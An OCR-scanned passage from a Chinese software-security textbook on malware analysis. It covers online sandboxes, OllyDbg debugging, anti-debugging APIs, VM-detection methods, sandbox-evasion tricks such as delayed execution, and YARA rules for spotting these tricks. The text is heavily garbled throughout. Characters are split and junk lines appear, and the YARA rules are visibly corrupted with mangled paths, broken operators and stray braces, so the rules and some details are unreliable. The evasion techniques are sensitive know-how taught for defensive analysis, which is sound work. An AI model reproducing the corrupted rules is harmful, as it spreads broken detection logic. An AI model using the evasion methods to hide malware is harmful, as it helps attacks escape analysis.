Swe hs J( Prim JO aser O corc O Hex Dunp OC hrrays Q Re 
Filter Out This Stream [ Close 


图 8-14 Wireshark 重组 的 HTTP 流量 


除了 利用 相关 工具 在 自己 构建 的 分 析 环 境 中 进行 动态 行为 分 析 , 当 前 ,学 术 界 和 工业 
界 也 提供 了 很 多 在 线 的 恶意 代码 动态 分 析 服 务 ,分 析 人 员 可 以 根据 需要 将 可 疑 代 码 上 传 
到 这 些 网 站 ,利用 网 站 后 台 的 动态 分 析 系 统 对 样本 文件 进行 自动 化 动态 行为 分 析 , 并 通过 
网 站 给 出 的 详细 分 析 报告 判断 可 疑 代 码 是 否 具有 恶意 性 。 相 关 的 在 线 恶 意 代 码 动态 分 析 
服务 有 Anubis?, Joe Sandbox?, BitBlaze?9, Norman SandBox®, GFI Sandbox@、 
ThreatExpert?, Comodo Instant Malware Analysis, EUREKA Malware Analysis? 
Malwr@ Wepawet 金刚 恶意 软件 智能 分 析 系 统 ( 即 原 TCA 软件 动态 分 析 云 平台 升级 
版 ) XPE BERRO RREO E KRO, 






































https: //anubis. iseclab. org. 

http://www. joesecurity. org/. 

https: //aerie. cs. berkeley. edu/. 
http://www. norman. com/security center/security tools/submit file. 
http://www. gfi. com/malware-analysis-tool/. 
http://www. threatexpert. com. 
http://camas. comodo. com/cgi-bin/submit. 
http://eureka. cyber-ta. org/. 

http://www. malwr. com/. 

http://wepawet. iseclab. org/. 

http://www. tcasoft. com/. 

https://www. b-chao. com. 

http://habo. qq. com/. 

https: //fireeye. ijinshan. com/. 
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维也纳 技术 大 学 主导 研发 的 动态 恶意 程序 分 析 平 台 Anubis 是 其 中 比较 有 特色 的 一 
个 平台 ,该 平台 的 研究 团队 早 在 2005 年 就 发 表 了 相关 分 析 技 术 的 研究 结果 中 ,并 在 融合 
多 年 研究 成 果 的 基础 上 研制 了 Anubis 平台 。 该 平台 底层 采用 QEMU 硬件 模拟 器 构建 
虚拟 化 动态 分 析 环 境 , 支 持 Windows 平台 可 执行 文件 和 Android 平台 APK 文件 的 安全 
性 分 析 , 可 详细 记录 样本 文件 在 运行 过 程 中 产生 的 文件 ,注册 表 、 进 程 、 系 统 服 务 、 网 络 等 
各 种 行为 ,并 给 出 HTML、XML 等 格式 的 详细 分 析 结 果 报 告 。 图 8-15 显示 了 Anubis 平 
人 台 一 个 分 析 结 果 报 告 的 摘要 ,其 中 可 以 看 出 该 样本 具有 的 主要 恶意 行为 类 型 及 描述 ,以 及 
相应 行为 的 风险 级 别 ,用 户 可 以 据 此 对 样本 的 行为 及 恶意 性 做 出 初步 判断 。 


Summary: 


Autostart capabilities: This executable registers processes to be executed at system start. This could result in unwanted aciors to be performed automatically. 
Changes security settings of Internet Explorer: This system alteraton could seriously affect safety surfing the World Wide Web. e 
Creates files in the Windows system directory: Maware often keeps copies of itself in the Windows directory to stay undetected by users. v 
Sends Emails: This program sends out e-mails to other people possibly in order to propagate itself. e 
Performs File Modification and Destruction: The executable modifies and destructs files which are not temporary. e 
Performs Registry Activities: The executable reads and modifies registry values. It may also create and montor registry keys. o 


图 8-15 Anubis 平台 分 析 结 果 报告 摘要 


833 动态 调试 分 析 


动态 调试 是 软件 分 析 的 重要 手段 ,在 恶意 代码 分 析 中 也 被 大 量 使 用 。 根 据 调 试 器 的 
运行 权限 不 同 ,调试 器 可 以 分 为 4 种 类 型 : Ring3 级 调试 器 、Ring0 级 调试 器 ,模拟 调试 器 
和 硬件 调试 器 。 动 态 调试 工具 有 很 多 种 , Windows 系统 上 有 微软 公司 提供 的 调试 工具 
WinDbg, 以 及 IDA Pro, OllyDbg, SoftICE, Immunity Debugger? 等 ,Linux 系统 上 则 有 
著名 的 开源 调试 器 gdb, Intel Debugger for Linux (IDB) 等 。 动 态 调试 工具 属于 高 级 的 动 
态 分 析 工 具 , 不 仅 具 有 强大 的 功能 ,还 提供 丰富 的 控制 选项 和 参数 ,因此 其 学 习 和 使 用 门 
槛 较 高 ,分 析 人 员 最 好 选 定 一 种 调试 工具 ,熟练 掌握 其 主要 功能 的 使 用 方法 ,并 在 必要 时 
参考 帮助 文档 和 相关 书籍 。 

这 里 以 OllyDbg? 为 例 简要 介绍 调试 工具 的 使 用 过 程 。OllyDbg 是 一 个 Windows 平 
台 汇 编 级 分 析 调 试 器 ,可 用 于 二 进 制 代码 调试 分 析 , 它 是 一 个 可 免费 下 载 、 使 用 的 共享 
软件 。 

以 VLC 播放 器 为 例 , 介 绍 利 用 OllyDbg 进行 跟踪 调试 的 大 致 流程 。 首 先 ,启动 
OllyDbg ,然后 通过 “打开 ?或 “附加 ”的 方式 加 载 需 要 调试 分 析 的 程序 ,如 图 8-16 所 示 。 
“打开 ?或 “附加 ?的 区 别 在 于 ,打开 ?是 在 调试 状态 下 打开 测试 程序 ,会 影响 程序 的 内 存 布 
局 ,如 调试 堆 等 ;而 “附加 ”方式 是 在 被 调试 程序 已 经 在 运行 的 情况 下 ,将 OllyDbg 附加 到 
被 调试 程序 上 去 。 


© http://immunitysec. com/products/debugger/. 
Q http://www. ollydbg. de/. 











CT 





8-16 用 OllyDbg 打开 VLC 播放 器 


如 图 8-17 所 示 ,在 OllyDbg 的 调试 主 界面 ,可 以 看 到 反 汇编 代码 .CPU 寄存 器 ,内 存 
É 7] 此 外 ,OllyDbg 还 提供 了 用 于 显示 线程 模块、 句柄, 断 点 .日 志 等 























图 8-17 OllyDbg 的 主 界面 
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序 运行 过 程 观察 不 同窗 口 的 信息 变化 ,对 程序 进行 分 析 。 

例如 ,如 果 和 希望 分 析 VLC 播放 器 处 理 音 视频 文件 的 过 程 ,应 该 从 程序 读 入 文件 开 
始 。 通 过 对 文件 读 取 API ReadFile 下 断 点 的 方式 ,可 以 很 快 地 捕获 这 一 过 程 。 为 此 , 需 
要 首先 通过 查找 功能 定位 ReadFile 的 位 置 ,如 图 8-18、 图 8-19 所 示 。 然 后 在 该 API 的 人 
口 点 设置 断 点 ,如 图 8-20 所 示 , 从 而 在 程序 调用 该 API 时 能 够 触发 断 点 ,暂停 执行 过 程 。 
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图 8-19 定位 ReadFile 的 位 置 
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图 8-20 在 目标 API 入 口 点 设置 断 点 


设置 好 断 点 后 ,继续 运行 被 调试 程序 ,用 其 打开 一 个 音频 文件 ,被 调试 程序 会 在 设置 
的 断 点 处 中 断 , 在 实际 调试 过 程 中 还 可 以 结合 IDA. 的 静态 反 汇 编 信 息 对 程序 的 执行 过 程 
进行 确认 。 如 图 8-21 所 示 , 可 以 看 到 被 调试 程序 命中 断 点 时 ReadFile 函数 的 相关 调用 参 
数 信息 ,结合 函数 原型 和 参数 语义 ,可 以 帮助 我 们 更 好 地 理解 程序 的 行为 ,如 图 8-22 
所 示 。 
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图 8-21 被 调试 程序 命中 断 点 
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BOOL ReadFile( 
HANDLE hFile, // 文 件 的 句柄 
LPVOID lpBuffer, // 用 十 保存 读 入 数据 的 一 个 缓冲 区 
DWORD nNumberOfBytesToRead, // 要 读 入 的 字 节 数 
LPDWORD lpNumberOfBytesRead,  // 指 器 实际 读 取 字 节 数 的 指针 
LPOVERLAPPED lpOverlapped 
// 如 文件 打开 时 指定 了 FILE_FLAG_OVERLAPPED， 那 么 必须 ， 用 这 个 参数 引用 一 个 特殊 的 结构 
// 该 结构 定义 了 一 次 异步 读 取 操 作 。 AN 应 将 这 个 参数 说 为 NULL 














Æ 8-22 ReadFile 函数 原型 


Ollydbg 提供 了 丰富 的 断 点 功能 ,可 以 设置 API 断 点 、 硬 件 断 点 .内存 断 点 、 消 息 断 点 
等 ,同时 可 以 对 断 点 添加 条 件 ,实现 如 * 第 5 次 运行 ReadFile 时 中 断 ” 这 样 的 功能 。 此 外 ， 
Ollydbg 还 支持 插件 ,分 析 人 员 可 以 通过 插件 实现 自 定义 的 功能 。 关 于 Ollydbg 调试 器 
的 详细 使 用 ,可 以 查阅 Ollydbg 官方 网 站 的 使 用 教程 和 帮助 文档 。 

动态 调试 分 析 可 以 获得 程序 动态 运行 时 的 真实 行为 信息 , 相 比 于 静态 分 析 更 加 具体 
和 准确 ,但 同时 ,由 于 动态 执行 时 各 种 外 部 条 件 的 限制 ,分 析 结 果 不 可 避免 地 受到 执行 路 
径 单 一 的 影响 ,无 法 全 面 地 分 析 程 序 的 各 种 运行 状态 。 恶 意 代 码 编 写 者 可 以 利用 这 一 点 
来 伪造 程序 行为 ,逃避 安全 软件 的 动态 检测 或 干扰 安全 人 员 对 恶意 代码 的 动态 分 析 。 为 
了 能 够 尽 可 能 多 地 分 析 程序 的 执行 路 径 , 覆 盖 尽 可 能 多 的 程序 执行 状态 ,触发 程序 的 各 种 
动态 行为 ,从 而 对 程序 进行 全 面 的 行为 分 析 , 学 术 界 也 展开 了 大 量 的 研究 工作 ,提出 了 多 
种 分 析 方法 。 

其 中 一 个 思路 是 把 待 分 析 程 序 放 在 不 同 的 环境 中 运行 ,观察 并 比较 在 不 同 环境 下 程 
序 行为 表现 的 差异 。 如 美国 德州 农工 大 学 的 Zhaoyan Xu 等 人 在 RAID 2014 上 提出 了 针 
对 恶意 代码 的 动态 分 析 方法 GoldenEye’? ,通过 动态 构造 并 行 分 析 环 境 , 结 合 推测 执行 的 
方式 ,选择 能 够 触发 恶意 行为 的 分 析 环 境 , 达 到 分 析 恶 意 代码 行为 的 目的 ,解决 环境 因素 
对 恶意 代码 行为 触发 的 影响 。 

一 个 思路 是 进行 动态 多 路 径 分 析 , 如 维也纳 技术 大 学 的 Andreas Moser 提出 的 动 
态 多 路 径 分 析 方法 3 ,该 方法 在 程序 执行 到 某 一 个 分 支点 时 保存 系统 状态 ,在 执行 完 某 
个 分 支 路 径 之 后 ,将 程序 恢复 到 上 一 个 保存 的 状态 ,并 改变 分 支 条 件 ,重新 选择 未 遍历 的 
分 支 路 径 继 续 开始 执 行 。 由 于 实际 的 程序 通常 包含 大 量 的 路 径 ,全 面 遍 历 所 有 路 径 会 面 
临 路 径 状 态 空 间 爆炸 的 问题 ,因此 ,这 种 动态 多 路 径 分 析 的 方法 在 实际 分 析 中 只 能 在 特定 
的 路 径 区 域 进行 。 

此 外 ,还 可 以 “强制 "程序 执行 特定 的 路 径 , 观 察 该 路 径 上 是 否 出 现 恶 意 行 为 。 如 Xu 
Dongyan 等 人 在 Security 2014 上 提出 了 通过 改变 条 件 判 断 或 跳 转 表 的 方式 ,在 不 需要 提 
供 特 定 输入 和 修改 运行 环境 的 情况 下 ,强制 程序 执行 特定 路 径 的 方法 K-Force, HA 
用 污点 传播 和 符号 执行 等 方法 可 以 理解 程序 如 何 根据 输入 数据 选择 执行 路 径 的 特点 , 通 
过 修改 相应 的 数据 使 程序 执行 到 不 同 的 路 径 ,达到 强制 程序 执行 特定 路 径 的 目的 。 


834 反 虚 拟 化 分 析 对 抗 
恶意 代码 为 了 避免 自身 被 发 现 和 分 析 , 通 常会 采用 一 些 反 调试 、 反 分 析 技 术 来 对 抗 分 
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析 过 程 。 由 于 动态 行为 分 析 、 代 码 调试 跟踪 等 分 析 工 具 普遍 依赖 操作 系统 提供 的 各 种 功 
能 接口 ,因此 ,通过 检测 操作 系统 相关 接口 .数据 结构 等 关键 点 的 代码 和 数据 ,恶意 代码 可 
以 检测 系统 中 正在 运行 的 各 种 安全 分 析 工 具 . 发 现 自身 是 否 处 于 被 跟踪 调试 的 状态 ,从 而 
采取 对 抗 措施 。 

检测 自身 是 否 被 调试 的 方法 有 很 多 ,如 通过 调用 如 下 的 系统 接口 可 以 获取 关于 自身 是 
否 被 调试 的 信息 : IsDebuggerPresent, OutputDebugString、ZwQuerySystemInformation、 
ZwQueryInformationProcess, IsDebugged, NtGlobalFlags、 CheckRemoteDebuggerPresent、 
SetInformation Thread, DebugActiveProcess 。 

另外 ,还 可 以 通过 检测 父 进程 的 名 字 、 枚 举 当 前 系统 中 运行 的 其 他 进程 等 方式 察觉 自 
身 是 否 被 调试 。 

除了 对 抗 直接 的 跟踪 调试 分 析 之 外 ,很 多 恶意 代码 还 包含 对 抗 虚拟 化 分 析 、 自 动 化 分 
析 的 功能 。 无 论 是 分 析 人 员 手 动 分 析 还 是 利用 自动 化 分 析 系 统 自 动 分 析 , 在 恶意 代码 分 
析 过 程 中 ,虚拟 化 技术 都 被 广泛 应 用 ,因此 ,恶意 代码 编写 者 为 了 对 抗 分 析 过 程 ,增加 恶意 
代码 分 析 的 难度 ,采用 了 各 种 各 样 的 反 虚 拟 化 分 析 、 反 自动 化 分 析 技 术 。 由 于 恶意 分 析 采 
用 的 虚拟 化 分 析 环 境 普 遍 基 于 VMWare, VirtualBox, KVM, XEN 等 几 个 主流 的 虚拟 化 
工具 构建 ,因此 ,通过 分 析 这 些 虚 拟 化 工具 构建 的 虚拟 系统 与 真实 系统 之 间 的 差异 ,恶意 
代码 可 以 察觉 自身 是 否 处 于 虚拟 系统 之 中 ,一 旦 发 现 自身 处 于 虚拟 系统 之 中 ,或 者 发 现 自 
身 正在 被 跟踪 调试 等 情况 ,就 可 以 采取 自我 销毁 、 隐 藏 恶意 行为 .进行 虚假 操作 等 方式 欺 
骗 分 析 人 员 ,对 抗 分 析 过 程 。 

例如 ,对 于 最 为 常见 的 VMWare 虚拟 机 环境 ,可 以 通过 如 下 的 方法 进行 检测 中 ; 

(1) 通过 执行 特权 指令 检测 虚拟 机 的 方法 。 

(2) 利用 中 断 描述 符 表 (IDT) 基 址 检测 虚拟 机 的 方法 。 

(3) 利用 本 地 描述 符 表 (LDT) 和 全 局 描述 符 表 (GDT) 基 址 检测 虚拟 机 的 方法 。 

(4) 基于 存储 任务 寄存 器 STR 内 容 检 测 虚 拟 机 的 方法 。 

(5) 基于 注册 表 项 内 容 检 测 虚拟 机 的 方法 。 

(6) 基于 指令 执行 时 间 差 检测 虚拟 机 的 方法 。 

(7) 利用 虚拟 硬件 指纹 检测 虚拟 机 的 方法 。 

例如 ,在 VMWare Workstation 12 软件 上 运行 的 Windows XP 系统 ,通过 ipconfig 
命令 可 以 看 到 其 网 络 设备 的 名 称 为 VMware Accelerated AMD PCNet Adapter, MAC Jl 
址 为 00-0C-29-93-F3-56。 由 于 00-05-69、00-0C-29 和 00-50-56 为 VMware 默认 使 用 的 网 
E MAC 地 址 前 缀 ,因此 ,通过 网 络 设备 名 称 和 MAC 地 址 很 容易 识别 出 当前 的 VMWare 
虚拟 机 环境 。 

此 外 ,在 VMWare Workstation 12 软件 上 运行 的 Windows XP 系统 中 执行 虚拟 机 检 
测 软 件 ScoopyNG?, 其 输出 结果 如 下 : 


TERERERSEERSESTERSEETERSSSESATEASTSATAATATEATATSATATESAA 44 
ScoopyNG - The VMware Detection Tool 


(D http://www. trapkit. de/research/vmm/scoopyng/index. html. 
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[+] Test 1 : IDT 
IDT base  : 0x8003f400 


Windows version v1.0 


Result : Native OS 


[*] Test 2: LDT 
LDT base  : Oxdead0000 
Result : Native OS 


[+] Test 3 : GDT 
GDT base  : 0x8003f000 
Result : Native OS 


*] Test 4 : STR 
STR base  : 0x28000000 
Result : Native OS 


+] Test 5 : VMware "get version" command 
Result : VMware detected 


Version : Workstation 


+] Test 6 : VMware "get memory size" command 


Result : VMware detected 








*] Test 7 : VMware emulation mode 
Result : Native OS or VMware without emulation mode 


(enabled acceleration) 


tk, 2008 

z: [ www.trapkit.de ] z: 

EESEREREEAESETSESAEÉESAEAASAAASAAASATAATASTASAATASAEATAdEAA4 

从 ScoopyNG 的 检测 结果 可 以 看 出 ,利用 IDT、.GDT、LDT 基 址 差异 和 STR 内 容 差 
异 的 检测 方法 已 经 无 法 识别 出 VMWare 虚拟 机 ,而 利用 其 他 特征 的 检测 方法 仍然 能 够 检 
illii. VMWare 虚拟 机 环境 。 

为 了 避免 恶意 代码 检测 到 虚拟 机 环境 ,恶意 代码 分 析 人 员 需 要 对 用 于 恶意 代码 分 析 
的 虚拟 机 进行 修改 和 配置 ,如 避免 在 虚拟 机 中 按照 类 似 VMWare Tools 等 带 有 显著 特征 
的 辅助 工具 ,在 注册 表 中 查找 VM Ware 相关 的 关键 字 ,并 根据 情况 进行 修改 和 替换 ,查看 
虚拟 机 的 硬件 设备 型 号 并 对 可 用 于 检测 的 特征 进行 修改 ,更 改 默认 的 网 络 MAC 地 址 , 删 
除 无 用 的 设备 驱动 等 。 

除了 对 虚拟 机 环境 进行 修改 和 配置 ,分 析 人 员 还 可 以 在 将 恶意 代码 放 入 虚拟 机 进行 
分 析 之 前 ,对 恶意 代码 是 否 包含 虚拟 机 检测 功能 进行 扫描 。 例 如 ,可 以 利用 YARA 工具 ， 
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采用 如 下 的 规则 对 恶意 代码 进行 扫描 : 


rule vm detect : vm detect 
{ 
meta: 
author = "TCA" 
type = "anti- analysis" 
severity =3 
description = "Detect Virtual Machines, Emulators" 
strings: 
$= "VIRTUAL HD" ascii wide nocase 
$ = "HARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id ON Logical Unit 
Id 0" ascii wide nocase 
$ = "HARDWARE \ \ \ \DEVICEMAP\ \ \ \Scsi \\\\sScsi Port 0\\\\Scsi Bus 0\\\\Target Id 0\\\ 
\Logical Unit Id 0" ascii wide nocase 
"HARDWARE \ \Description\\System" ascii wide nocase 
HARDWARENNNNDescription NNNM System" ascii wide nocase 
SYSTEM\ \ControlSet001\\Services\\Disk\\Enum" ascii wide nocase 
= "SYSTEMNNNControlSet001NNN Services NN NDi sKNNNNEnum" ascii wide nocase 
// SYSTEMNControlSetO0lVServices 


$ vmsrvcl -"vmicheartbeat" ascii wide nocase 







$ 


$ vmsrvc2 = "vmicvss" ascii wide nocase 

$ vmsrvc3 = "vmicshutdown" ascii wide nocase 
$ vmsrvc4 = "vmicexchange" ascii wide nocase 
$ vmsrvc5 = "vmci" ascii wide nocase 

$ vmsrvc6 = "vmdebug" ascii wide nocase 

$ vmsrvc? = "vmmouse" ascii wide nocase 

$ vmsrvc8 = "VMTools" ascii wide nocase 

$ vmsrvc9 = "VMMEMCTL" ascii wide nocase 

$ vmsrvcl0 = "vmware" ascii wide nocase 

$ vmsrvcll —"vmx86" ascii wide nocase 

$ vmsrvcl2 —"vpcbus" ascii wide nocase 

$ vmsrvcl3 ="vpc- s3" ascii wide nocase 

$ vmsrvcl4 = "vpcuhub" ascii wide nocase 

$ vmsrvcl5 = "msvmmouf" ascii wide nocase 

$ vmsrvclé = "VBoxMouse" ascii wide nocase 

$ vmsrvcl7 —"VBoxGuest" ascii wide nocase 

$ vmsrvcl8 —"VBoxSF" ascii wide nocase 

$ vmsrvcl9 —"xenevtchn" ascii wide nocase 

$ vmsrvc20 —"xennet" ascii wide nocase 

$ vmsrvc21 —"xennet6" ascii wide nocase 


"xensvc" ascii wide nocase 


$ vmsrvc22 = 
$ vmsrvc23 ="xenvdb" ascii wide nocase 


condition: 


软件 安全 分 析 与 应 用 


2 of them 


} 


需要 注意 的 是 ,由 于 恶意 代码 可 能 采用 了 加 密 、 加 过 等 代码 保护 技术 ,因此 静态 的 代 
码 扫描 可 能 无 法 识别 其 中 的 文本 ,这 种 预先 的 静态 分 析 只 能 在 一 定 程度 上 帮助 分 析 人 员 
发 现 具有 虚拟 机 检测 功能 的 恶意 代码 。 

5j VMWare 等 虚拟 化 软件 构建 的 虚拟 机 相 比 ,利用 类 似 Intel. VT 这 样 的 硬件 支持 
的 虚拟 化 技术 构建 的 虚拟 机 环境 以 及 利用 QEMU 等 硬件 模拟 器 构建 的 虚拟 机 显得 更 为 
真实 ,也 更 难 检测 。 然 而 ,相关 研究 已 经 表明 ,此 类 虚拟 机 仍然 可 以 通过 多 种 技术 手段 被 
检测 中。 

由 于 计算 机 是 由 各 种 软件 和 硬件 构成 的 复杂 系统 ,虚拟 化 技术 的 不 断 发 展 和 虚拟 化 
软件 的 完善 能 够 减少 虚拟 机 环境 被 发 现 的 概率 ,但 随 着 分 析 和 反 分 析 对 抗 的 不 断 进 行 ,也 
会 有 更 多 新 的 检测 技术 被 提出 。 因 此 ,在 恶意 代码 分 析 工 作 中 ,分 析 人 员 要 不 断 调整 分 析 
环境 ,减少 可 以 用 于 识别 的 虚拟 机 环境 特征 ,同时 ,也 要 时 刻 注意 分 析 过 程 中 出 现 的 异常 
现象 ,发 现 潜在 的 分 析 对 抗 技术 和 方法 ,从 而 不 断 完善 分 析 技 术 , 优 化 虚拟 化 分 析 环 境 。 


835 反 自 动 化 分 析 对 抗 


由 于 自动 变形 .多 态 等 技术 的 运用 ,以 及 代码 生成 器 等 工具 的 出 现 ,恶意 代码 数量 急 
速 增长 ,在 大 型 网 络 中 每 天 可 以 检测 到 数 以 万 计 的 可 疑 代码 ,如 何 对 海量 的 可 疑 代码 进行 
快速 分 析 成 为 摆 在 恶意 代码 分 析 人 员 面 前 的 重要 问题 。 为 了 提高 分 析 效 率 和 响应 速度 ， 
各 种 恶意 代码 自动 化 分 析 技术 被 提出 来 ,大 量 的 自动 化 恶意 代码 分 析 系 统 被 研制 并 投入 
使 用 。 很 多 专业 的 网 络 安全 机 构 都 部 署 有 包含 自动 化 分 析 功 能 的 恶意 代码 分 析 系 统 , 通 
过 自动 化 分 析 结 合 人 工分 析 确认 的 方式 ,大 大 提高 了 恶意 代码 的 分 析 速 度 和 效率 。 

一 个 典型 的 自动 化 恶意 代码 分 析 系 统 的 分 析 流 程 与 人 工分 析 十 分 类 似 , 也 是 通过 利 
用 各 种 检测 、 分 析 工 具 先 对 可 疑 代 码 进 行 静态 扫描 、 属 性 分 析 、 代 码 分 析 , 再 将 可 疑 代 码 置 
和 人 可 控 分 析 环境 ,进行 动态 分 析 , 最 后 综合 利用 各 个 分 析 阶 段 采 集 的 分 析 数 据 ,识别 其 中 
具有 恶意 性 的 特征 ,进而 对 可 疑 代 码 是 否 具 有 恶意 性 进行 判定 。 

为 了 绕 过 这 种 自动 化 检测 分 析 手 段 ,恶意 代码 编写 者 也 不 断 尝 试 采用 各 种 技术 来 对 
抗 自动 化 分 析 系 统 。 在 静态 分 析 阶 段 ,恶意 代码 可 以 添加 一 些 导 致 特定 分 析 工具 无 法 自 
动 识别 和 处 理 的 垃圾 数据 ,以 此 来 阻碍 自动 分 析 过 程 。 由 于 在 静态 分 析 过 程 中 ,恶意 代码 
无 法 感知 外 界 对 其 施加 的 分 析 过 程 ,也 无 法 对 外 界 做 出 响应 ,因此 , 反 自 动 化 分 析 对 抗 更 
多 地 集中 在 动态 分 析 阶 段 。 例 如 ,为 了 提高 自动 化 分 析 系 统 的 效率 ,在 分 析 环 境 中 恶意 代 
码 通常 只 会 运行 几 分 钟 ,因此 ,恶意 代码 可 以 在 开始 运行 之 后 睡眠 一 段 时 间 再 执行 真正 的 
操作 ,从 而 避免 被 自动 分 析 系 统 捕获 恶意 行为 。 

与 反 虚 拟 化 分 析 技 术 一 样 , 反 自动 化 分 析 对 抗 也 有 多 种 方式 ,攻击 者 会 不 断 摸索 、 探 
测 目标 自动 化 分 析 系 统 的 特性 ,而 一 旦 攻击 者 掌握 了 这 些 特性 ,就 可 以 据 此 采取 有 针对 人 性 
的 策略 ,检测 和 阻碍 自动 化 分 析 过 程 。 这 对 公开 可 访问 的 自动 化 分 析 系统 的 影响 尤为 明 
显 , 若 攻击 者 可 以 访问 和 使 用 自动 化 分 析 系 统 , 则 其 可 以 通过 使 用 分 析 系 统 , 上 传 具有 各 
种 探测 能 力 的 测试 程序 ,来 发 现 自动 化 分 析 系统 的 特征 和 缺陷 ,从 而 制定 有 针对 性 的 对 抗 
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总 的 来 说 , 反 自 动 化 分 析 对 抗 技术 可 以 分 为 如 下 几 类 : 

用 户 行为 相关 的 对 抗 技术 。 如 通过 检测 运行 环境 中 是 否 存在 鼠标 移动 ,键盘 按键 
等 消息 事件 ,监视 运行 环境 中 是 否 存在 光驱 插入 弹出 ,U 盘 等 移动 存储 插 人 拔 出 
等 用 户 操作 ,识别 无 人 值守 的 自动 化 分 析 系统 。 

分 析 系 统 环境 相关 的 对 抗 技术 。 通 过 检测 运行 环境 的 系统 序列 号 、 用 户 名 、 内 存 
大 小 、 硬 盘 大 小 、 是 否 可 以 访问 特定 网 站 、 所 属 的 TP. 地 址 段 等 识别 自动 化 分 析 
系统 。 

分 析 系 统 软 件 相关 的 对 抗 技术 。 通 过 查看 分 析 系 统 是 否 安装 常见 应 用 软件 、 是 否 
运行 了 特定 的 信息 采集 工具 等 识别 自动 化 分 析 系统 。 

时 间 相 关 的 对 抗 技术 。 通 过 调用 sleep 系统 函数 、 循 环 执行 特定 的 代码 段 等 拖延 
时 间 的 操作 ,迫使 自动 化 分 析 过 程 超时 终止 ,或 者 只 在 特定 时 间 段 执行 恶意 行为 ， 
从 而 避免 被 自动 化 分 析 系 统 检测 到 真实 行为 。 

分 析 系 统 自 身 相 关 的 对 抗 技术 。 通 过 执行 循环 的 加 解密 操作 ,重复 调用 大 量 无 意 
义 的 系统 调用 等 ,迫使 分 析 系 统 记录 大 量 的 分 析 过 程 数 据 ,从 而 超过 分 析 系 统 可 
记录 的 过 程 数据 的 容量 限制 ,冲刷 和 掩盖 真实 行为 相关 的 数据 ,或 造成 分 析 系 统 
过 载 ,无 法 顺利 完成 自动 分 析 过 程 。 

与 其 他 分 析 与 反 分 析 技术 对 抗 一 样 ,自动 化 分 析 与 反 自动 化 分 析 也 是 一 个 " 猫 和 老 
鼠 * 类 似 的 循环 往复 的 对 抗 过 程 。 对 于 不 同 的 反 自 动 化 分 析 技 术 , 需 要 采取 不 同 的 应 对 措 
施 。 例 如 ,对 于 用 户 行为 相关 的 对 抗 技术 ,可 以 为 自动 化 分 析 系 统 增加 用 户 操作 模拟 功 
能 ,从 而 使 恶意 代码 难以 区 分 真实 系统 和 分 析 系 统 。 对 于 分 析 系 统 自身 相关 的 对 抗 技术 ， 
一 方面 要 增强 系统 自身 的 健壮 性 ,避免 被 恶意 代码 攻击 ,同时 还 可 以 将 类 似 导 致 分 析 系统 
异常 的 行为 本 身 视 为 一 种 恶意 行为 ,从 而 发 现 包含 此 类 对 抗 技术 的 恶意 代码 。 

对 于 一 些 利 用 分 析 系 统 属性 特征 进行 对 抗 的 技术 ,可 以 采用 特征 扫描 的 方式 在 静态 
分 析 和 动态 分 析 过 程 中 予以 检测 。 例 如 ,有 些 恶 意 代 码 通 过 动态 分 析 系 统 使 用 的 操作 系 
统 序列 号 检测 CWSandbox、Anubis、JoeBox 等 分 析 系 统 ,对 此 ,可 以 利用 YARA 工具 ,并 
采用 如 下 的 规则 对 恶意 代码 进行 扫描 : 


rule sandbox detect : sandbox detect 
t 
meta: 
author ="TCA" 
type = "anti- analysis" 
severity -3 
description - "Sandbox detection tricks" 
strings: 
$="76487- 640- 1457236- 23837" ascii wide 
$="76487- 337- 8429955- 22614" ascii wide 
$="76487- 644- 3177037- 23510" ascii wide 
$="76497- 640- 6308873- 23835" ascii wide 
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$ — "55274- 640- 2673064- 23950" ascii wide 
$="76487- 640- 8834005- 23195" ascii wide 
$="76487- 640- 0716662- 23535" ascii wide 
$="76487- 644- 8648466- 23106" ascii wide 
$ — "00426- 293- 8170032- 85146" ascii wide 
$="76487- 341- 5883812- 22420" ascii wide 
$="76487- OEM- 0027453- 63796" ascii wide 
condition: 
any of them 
) 


而 对 于 时 间 相 关 的 对 抗 技术 则 较 难 处 理 。 对 于 调用 sleep 系统 函数 将 自身 挂 起 等 待 
一 段 时 间 的 方式 ,常见 的 方法 是 拦截 样本 对 该 函数 的 调用 ,并 通过 修改 调用 参数 缩短 挂 起 
时 间 ,或 者 直接 返回 迫使 样本 继续 执行 。 然 而 ,恶意 代码 编写 者 可 以 通过 其 他 多 种 等 效 的 
方式 实现 时 间 延 迟 ,为 此 ,维也纳 技术 大 学 的 Clemens Kolbitsch 等 人 提出 了 一 种 绕 过 恶 
意 代 码 延 时 操作 的 方法 9 ,该 方法 通过 检测 恶意 代码 执行 进度 停滞 的 情况 ,在 恶意 代码 
执行 停滞 时 动态 识别 导致 执行 停滞 的 可 疑 代 码 ,进而 在 执行 这 些 可 疑 代 码 时 暂停 分 析 记 
录 , 并 在 必要 时 通过 改变 恶意 代码 执行 流程 跳出 导致 执行 停滞 的 代码 区 域 ,从 而 使 恶意 代 
码 执行 过 程 得 以 继续 推进 。 虽 然 在 基于 该 方法 研制 的 验证 系统 HASTEN 上 开展 的 实验 
表明 ,该 方法 对 一 些 采 用 时 间 相 关 对 抗 技术 的 恶意 代码 具有 一 定 效果 ,但 由 于 延 时 操作 可 
以 具有 很 多 不 同 的 实现 方式 ,该 方法 无 法 准确 识别 所 有 这 些 延 时 操作 代码 ,同时 , 跳 过 延 
时 操作 代码 也 可 能 导致 包含 其 中 的 恶意 行为 无 法 被 触发 ,并 可 能 导致 恶意 代码 状态 异常 
而 无 法 继续 执行 。 因 此 ,在 实际 的 恶意 代码 分 析 中 ,分 析 人 员 需 要 特别 关注 具有 时 间 相 关 
对 抗 技术 的 恶意 代码 ,在 必要 时 需要 对 其 进行 人 工分 析 。 

反 虚 拟 化 、 反 自动 化 分 析 的 对 抗 是 长 期 的 ,任何 固定 的 .可 以 预测 的 特征 都 可 以 被 用 
来 识别 分 析 环 境 , 因 此 ,更 好 的 方式 是 将 这 些 特 征 随机 化 ,使 其 不 可 预测 。 例 如 ,对 于 操作 
系统 序列 号 ,可 以 采取 随机 设置 的 方式 ,这 需要 动态 构建 虚拟 环境 。 另 一 种 方式 是 将 读 取 
序列 号 等 特征 的 行为 视 为 可 疑 操作 ,从 而 检测 分 析 对 抗 行为 。 类 似 地 ,分 析 人 员 可 以 将 任 
何 一 项 对 调试 ,分析 和 环境 的 检测 行为 视 为 可 疑 行为 ,用 作 分 析 对 抗 的 标志 ,从 而 发 现 具 
有 反 虚 拟 化 、 反 自动 化 分 析 功 能 的 恶意 代码 。 


8.4 实际 案例 分 析 


